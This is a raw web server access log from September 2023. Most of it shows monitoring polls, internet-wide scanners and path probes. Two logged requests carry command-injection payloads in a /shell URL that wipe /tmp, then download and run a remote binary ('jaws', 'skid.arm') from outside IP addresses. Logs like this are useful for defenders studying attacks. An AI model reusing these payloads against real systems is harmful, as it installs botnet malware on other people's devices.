79.124.56.254 - - [04/Sep/2023:08:59:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:08:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.56.254 - - [04/Sep/2023:09:03:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:09:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.158.37.190 - - [04/Sep/2023:09:04:10 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.158.37.190 - - [04/Sep/2023:09:04:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:09:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.118 - - [04/Sep/2023:09:05:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:09:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.210.126 - - [04/Sep/2023:09:21:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Sep/2023:09:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.236.147.154 - - [04/Sep/2023:09:25:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
23.236.147.154 - - [04/Sep/2023:09:25:29 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
23.236.147.154 - - [04/Sep/2023:09:25:29 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
23.236.147.154 - - [04/Sep/2023:09:25:30 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
23.236.147.154 - - [04/Sep/2023:09:25:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:09:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
101.32.103.44 - - [04/Sep/2023:09:29:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
212.91.246.72 - - [04/Sep/2023:09:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.14.26.208 - - [04/Sep/2023:09:33:10 +0200] "GET /restore.php HTTP/1.1" 404 316 "-" "-"
212.91.246.72 - - [04/Sep/2023:09:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:34:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.56.254 - - [04/Sep/2023:09:35:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:09:35:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:36:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.228.199.158 - - [04/Sep/2023:09:37:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
212.91.246.72 - - [04/Sep/2023:09:37:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:38:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:39:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.210.9 - - [04/Sep/2023:09:40:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Sep/2023:09:41:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:43:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.101.87 - - [04/Sep/2023:09:43:52 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Sep/2023:09:44:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.164.17.14 - - [04/Sep/2023:09:46:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:09:46:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:47:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Sep/2023:09:48:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Sep/2023:09:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:50:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:51:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.139.67 - - [04/Sep/2023:09:52:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
64.62.197.207 - - [04/Sep/2023:09:52:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
64.62.197.44 - - [04/Sep/2023:09:52:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56"
212.91.246.72 - - [04/Sep/2023:09:52:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.205 - - [04/Sep/2023:09:53:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50"
212.91.246.72 - - [04/Sep/2023:09:53:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.139.67 - - [04/Sep/2023:09:53:55 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
64.62.197.43 - - [04/Sep/2023:09:54:09 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
64.62.197.203 - - [04/Sep/2023:09:54:21 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0"
212.91.246.72 - - [04/Sep/2023:09:54:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.139.67 - - [04/Sep/2023:09:54:51 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
64.62.197.36 - - [04/Sep/2023:09:54:56 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.56"
213.47.240.170 - - [04/Sep/2023:09:55:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:09:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.56.254 - - [04/Sep/2023:09:56:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:09:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.162 - - [04/Sep/2023:09:58:12 +0200] "GET /.hg HTTP/1.1" 404 308 "-" "python-requests/2.31.0"
179.43.191.162 - - [04/Sep/2023:09:58:12 +0200] "GET /.svn HTTP/1.1" 404 309 "-" "python-requests/2.31.0"
212.91.246.72 - - [04/Sep/2023:09:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:09:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.12.211.187 - - [04/Sep/2023:10:01:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [04/Sep/2023:10:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.56.254 - - [04/Sep/2023:10:04:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:10:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.56.254 - - [04/Sep/2023:10:07:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:10:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [04/Sep/2023:10:15:17 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [04/Sep/2023:10:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.111.152 - - [04/Sep/2023:10:15:52 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
167.99.141.170 - - [04/Sep/2023:10:16:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
198.199.111.152 - - [04/Sep/2023:10:16:08 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.111.152 - - [04/Sep/2023:10:16:11 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.111.152 - - [04/Sep/2023:10:16:13 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
161.18.150.176 - - [04/Sep/2023:10:16:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
198.199.111.152 - - [04/Sep/2023:10:16:22 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.111.152 - - [04/Sep/2023:10:16:22 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
35.176.42.208 - - [04/Sep/2023:10:16:35 +0200] "" 501 315 "-" "-"
198.199.111.152 - - [04/Sep/2023:10:16:44 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.111.152 - - [04/Sep/2023:10:16:46 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Sep/2023:10:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.111.152 - - [04/Sep/2023:10:16:50 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.111.152 - - [04/Sep/2023:10:16:51 +0200] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Sep/2023:10:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.176.42.208 - - [04/Sep/2023:10:18:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:10:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
200.80.118.67 - - [04/Sep/2023:10:20:10 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 5.253.246.16/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [04/Sep/2023:10:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.98.92.36 - - [04/Sep/2023:10:20:51 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget http://185.254.37.243/skid.arm; chmod 777 skid.arm; ./skid.arm Jaws; rm -rf * HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
170.64.134.89 - - [04/Sep/2023:10:21:10 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
170.64.134.89 - - [04/Sep/2023:10:21:26 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
170.64.134.89 - - [04/Sep/2023:10:21:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Sep/2023:10:21:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:22:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:23:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.176.42.208 - - [04/Sep/2023:10:23:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Sep/2023:10:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:25:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.176.42.208 - - [04/Sep/2023:10:26:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:10:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [04/Sep/2023:10:27:29 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [04/Sep/2023:10:27:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.176.42.208 - - [04/Sep/2023:10:27:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.224.238 - - [04/Sep/2023:10:28:28 +0200] "" 501 315 "-" "-"
212.91.246.72 - - [04/Sep/2023:10:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:29:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.176.42.208 - - [04/Sep/2023:10:30:07 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:10:30:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.170.224.238 - - [04/Sep/2023:10:30:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
79.124.56.254 - - [04/Sep/2023:10:31:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Sep/2023:10:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Sep/2023:10:32:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.189.211.1 - - [04/Sep/2023:10:32:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.189.211.1 - - [04/Sep/2023:10:32:56 +0200] "OPTIONS / HTTP/1.0" 200 - "-" "-"
18.170.224.238 - - [04/Sep/2023:10:33:01 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.176.42.208 - - [04/Sep/2023:10:33:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.170.224.238 - - [04/Sep/2023:10:33:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Sep/2023:10:33:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
